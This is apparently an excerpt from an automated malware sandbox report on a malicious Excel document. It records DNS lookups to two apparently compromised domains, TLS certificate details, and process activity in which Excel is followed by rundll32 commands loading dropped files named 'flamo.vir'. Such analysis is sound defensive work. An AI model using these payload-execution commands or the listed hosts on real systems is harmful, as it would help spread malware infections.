                                                                                                                                                                                                                  Jun 29, 2021 17:47:22.045356035 CEST44349741108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:22.045507908 CEST49741443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:22.417372942 CEST49741443192.168.2.4108.179.232.80

UDP Packets


                                                                                                                                                                                                                  DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 29, 2021 17:47:16.690315008 CEST | 192.168.2.4 | 8.8.8.8 | 0xe30f | Standard query (0) | psq.com.mx | A (IP address) | IN (0x0001)
Jun 29, 2021 17:47:18.234659910 CEST | 192.168.2.4 | 8.8.8.8 | 0x544f | Standard query (0) | academy.haleemcampus.com | A (IP address) | IN (0x0001)

                                                                                                                                                                                                                  DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 29, 2021 17:47:16.874973059 CEST | 8.8.8.8 | 192.168.2.4 | 0xe30f | No error (0) | psq.com.mx | | 162.241.2.112 | A (IP address) | IN (0x0001)
Jun 29, 2021 17:47:18.292426109 CEST | 8.8.8.8 | 192.168.2.4 | 0x544f | No error (0) | academy.haleemcampus.com | | 108.179.232.80 | A (IP address) | IN (0x0001)

                                                                                                                                                                                                                  HTTPS Packets

Timestamp: Jun 29, 2021 17:47:17.197526932 CEST
Source IP: 162.241.2.112
Source Port: 443
Dest IP: 192.168.2.4
Dest Port: 49734
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19
Certificate chain:
Subject | Issuer | Not Before | Not After
CN=psq.com.mx | CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB | Tue Jul 28 02:00:00 CEST 2020 | Thu Jul 29 01:59:59 CEST 2021
CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB | CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US | Fri Nov 02 01:00:00 CET 2018 | Wed Jan 01 00:59:59 CET 2031

Timestamp: Jun 29, 2021 17:47:18.617918968 CEST
Source IP: 108.179.232.80
Source Port: 443
Dest IP: 192.168.2.4
Dest Port: 49736
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19
Certificate chain:
Subject | Issuer | Not Before | Not After
CN=www.academy.haleemcampus.com | CN=R3, O=Let's Encrypt, C=US | Tue May 25 09:21:24 CEST 2021 | Mon Aug 23 09:21:24 CEST 2021
CN=R3, O=Let's Encrypt, C=US | CN=ISRG Root X1, O=Internet Security Research Group, C=US | Fri Sep 04 02:00:00 CEST 2020 | Mon Sep 15 18:00:00 CEST 2025
CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Jan 20 20:14:03 CET 2021 | Mon Sep 30 20:14:03 CEST 2024

                                                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                  General

Start time: 17:47:10
Start date: 29/06/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0xe40000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                                                                                  General

Start time: 17:49:08
Start date: 29/06/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32 ..\flamo.vir,DllRegisterServer
Imagebase: 0x20000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                                                                                  General

Start time: 17:49:09
Start date: 29/06/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32 ..\flamo.vir1,DllRegisterServer
Imagebase: 0x20000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                  Code Analysis
